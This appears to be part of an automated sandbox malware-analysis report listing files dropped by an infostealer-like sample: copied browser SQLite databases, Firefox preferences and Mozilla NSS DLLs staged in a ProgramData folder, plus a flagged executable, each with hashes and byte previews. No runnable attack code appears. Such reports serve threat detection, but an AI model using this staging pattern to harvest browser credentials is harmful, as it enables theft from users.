SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\DHCFID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\FBAKEH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\FHDAFI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\HJKJKK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\IEBFHC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DHDAFBFCFHID\IJDHCB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\IJKFCF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: wqOq2pxuQB.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.TrojanX-gen.20423.9863.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: FE89Nae47k.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.TrojanX-gen.8387.16538.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHDAFBFCFHID\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073660207845363
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrh:KooCEYhgYEL0In
MD5:	67096BE3467DA594C2E63C54CB0395FF
SHA1:	F623D24D8FAAEA3AC088895671BD1E02FF060801
SHA-256:	F4B8EDD3CF26B72B37F95D5FCFE50B3C9FDCE506D65BE9ED96ECE35457FFD164
SHA-512:	FB18C0ADFCFC8897D53E6C38E68A3C5D1E7D828F62824D81BDD3CF605A1885BAE3330A6641DA6A76157E15198FBB6FD088A077EB50EB9F964AC4DB97ED26E19D
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xdf63d202, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221524389355474
Encrypted:	false
SSDEEP:	1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
MD5:	1640DA961957F5E81FAD15115F580287
SHA1:	261EC80E2F6FBFC086B216D35427FB320D7727A5
SHA-256:	59D14C138128C8632BE5AFBF05BC8602DE5DE41133EC662AEDB6E5D980D49F23
SHA-512:	FCA3497C9B0EDE59A1261048DFB1BADFB0B9A73DF9A0214F4D365E99CD19B796CA31E4D836538CA0952C58D0DB26E03BF27EBF571FD2AC4047465D14E549420D
Malicious:	false
Preview:	.c..... .......A.......X\...;...{......................0.!..........{A.....\|i.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................WY.....\|......................*....\|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07661635297760126
Encrypted:	false
SSDEEP:	3:LS//KYe4FvrGhGjjn13a/0n6r1QlAllcVO/lnlZMxZNQl:LS//KzivqhGj53q06r1wAOewk
MD5:	550000289A5B3686EA4CCBCEF1CF122C
SHA1:	F5A9DAECDD8B4601AEB9C448A8E7E419DA8E5814
SHA-256:	40ECF17141D7873EC7694EFBF2479261D244DBA2A9757D88971A4D381580E03F
SHA-512:	2D399D44A86F8C854BFD5731D9FFF0053751E98DB349996E5CDAC811619E902AC40955618920B5250268688B81604E857C891046340405AFFB4F2073B31A03CE
Malicious:	false
Preview:	.........................................;...{......\|.......{A..............{A......{A..........{A]........................\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\xprfjygruytr\etzpikspwykg.exe

Download File

Process:	C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10590720
Entropy (8bit):	7.970373644459469
Encrypted:	false
SSDEEP:	196608:V+Zh8TZ4EwkJcPAyxxycUgqToe0ERIdBxZC7dmmvYGW8Jv:jrhutxSgWPcxZCJNL
MD5:	488D85695B6E76307AA595F8DB6A48FC
SHA1:	63F7682DD687A55D1AE0000B242C06CF334A7534
SHA-256:	433CED4F31E8BFB3F0C02FE88255D4FC109C8BC2F4D8BD51EAE700CFF631D191
SHA-512:	B106C3E8153F5A974C5751BB44A4056E33C185FDB825293A4F583E9BAAD0C168B43A67A20BA4474885D7DBC4F4CA75C7896378C61D95399C739FDCCE204EF9C1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\.f..........#.................O`V........@.............................P............ ..................................................=W.<....@......@...`*............................................].(.......8............... ............................text...v~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..S.%......................... ..`.text1..X...........................@....text2..............................`..h.rsrc........@......................@..@........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dc25WcfSyV8lvRa9ThM7DR04.exe.log

Download File

Process:	C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat92n4M6:ML9E4KlKDE4KhKiKhg84j
MD5:	AE6AF1A0CB468ECBA64E2D77CB4517DB
SHA1:	09BD6366ED569ADB79274BBAB0BBF09C8244FD97
SHA-256:	3A917DCBC4952EA9A1135B379B56604B3B63198E540C653683D522445258B710
SHA-512:	E578CD0D9BF43FD1BA737B9C44B70130462CE55B4F368E2E341BB94A3A3FFA47D4A9FE714EB86926620D1B4BE9FFF4582C219DF9ACC923C765650B13C5451500
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HBnXrwXMNXUElNaizB6OqLMm.exe.log

Download File

Process:	C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat92n4M6:ML9E4KlKDE4KhKiKhg84j
MD5:	AE6AF1A0CB468ECBA64E2D77CB4517DB
SHA1:	09BD6366ED569ADB79274BBAB0BBF09C8244FD97
SHA-256:	3A917DCBC4952EA9A1135B379B56604B3B63198E540C653683D522445258B710
SHA-512:	E578CD0D9BF43FD1BA737B9C44B70130462CE55B4F368E2E341BB94A3A3FFA47D4A9FE714EB86926620D1B4BE9FFF4582C219DF9ACC923C765650B13C5451500
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NoCZBiPwAcSyoDte_ne2sJt7.exe.log

Download File

Process:	C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat92n4M6:ML9E4KlKDE4KhKiKhg84j
MD5:	AE6AF1A0CB468ECBA64E2D77CB4517DB
SHA1:	09BD6366ED569ADB79274BBAB0BBF09C8244FD97
SHA-256:	3A917DCBC4952EA9A1135B379B56604B3B63198E540C653683D522445258B710
SHA-512:	E578CD0D9BF43FD1BA737B9C44B70130462CE55B4F368E2E341BB94A3A3FFA47D4A9FE714EB86926620D1B4BE9FFF4582C219DF9ACC923C765650B13C5451500
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bQnXcKn6ehLDJGqEStjbnSyC.exe.log

Download File

Process:	C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	3FD5C0634443FB2EF2796B9636159CB6
SHA1:	366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
SHA-256:	58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
SHA-512:	8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eROo1ugNChgONSxoiS6DxyMi.exe.log

Download File

Process:	C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
